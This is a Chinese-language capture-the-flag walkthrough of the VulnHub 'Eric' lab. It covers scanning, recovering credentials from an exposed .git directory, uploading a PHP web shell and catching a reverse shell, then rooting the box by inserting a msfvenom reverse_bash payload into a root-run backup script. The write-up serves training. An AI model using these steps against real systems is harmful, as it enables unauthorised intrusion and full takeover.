VulnHub靶機學習——Eric

  • 2019 年 11 月 25 日
  • 筆記

聲明:Tide安全團隊原創文章,轉載請聲明出處!文中所涉及的技術、思路和工具僅供以安全為目的的學習交流使用,任何人不得將其用於非法用途以及盈利等目的,否則後果自行承擔!

一,運行說明

* 靶機難度:初級

* 目 標:提權、獲取flag

* 運行環境:攻擊機kali linux

靶機Eric

運行於VM VirtualBox中

* 網絡設置:均為Nat模式

* Flag目錄:/root/flag.txt

/home/eric/flag.txt

二、過程

作者已經說明flag的具體位置,但是該有的操作還是要有的~

1、前期信息搜集

剛裝好的靶機,當然是先要用nmap找到地址~。kali地址是10.0.2.4,靶機地址10.0.2.5

可以看到開放了22和80端口,先在瀏覽器中打開看看。

說是未完成的博客,好吧,再用nmap和dirbuster爆破,同時進行省時省力

可以看到有admin.php,.git文件,upload目錄等許多有用的東西,先看一下admin.php

admin.php是一個登錄頁,直接爆破的話大概率是不可行的,賬戶密碼應該會藏在別的地方,先繼續看看

源代碼里也沒啥

使用Githack掃描目錄,GitHack是一個.git泄露利用腳本,下載地址https://github.com/lijiejie/GitHack,下載後直接在python環境中運行即可

掃描後的結果保存在本地以URL命名的文件夾中,可以看到admin.php及index.php的源碼已經被還原,打開看一下

找到了登陸用的賬戶密碼,直接拿來登錄去

2、文件上傳、反彈shell

登錄後是一個上傳頁面,看起來沒有限定上傳文件的格式

直接上傳木馬試試

然後在kali監聽6666端口,瀏覽器訪問upload目錄下的6666.php

很好,直接就成功了,不算很難嘛。直接su –

這個好辦,幾乎每次都會遇到。python3 -c 『importpty;pty.spawn(「/bin/bash」)』

作者已經告訴我們flag地址了,先找/home/eric/flag.txt

在這個eric目錄下,我們還發現了一個backup.sh文件,這個文件是以root身份運行的,並且具有所有的權限

那麼我們可以利用這個backup.sh文件提權到root,可以利用上次用到的msfvenom生成腳本

3、提權

kali本地執行msfvenom-p cmd/unix/reverse_bash lhost=10.0.2.4 lport=1234 R

將生成的payload加載到backup.sh中去

然後在本地監聽1234端口,靶機中運行腳本

以root身份進入靶機後即可查看第二個flag.txt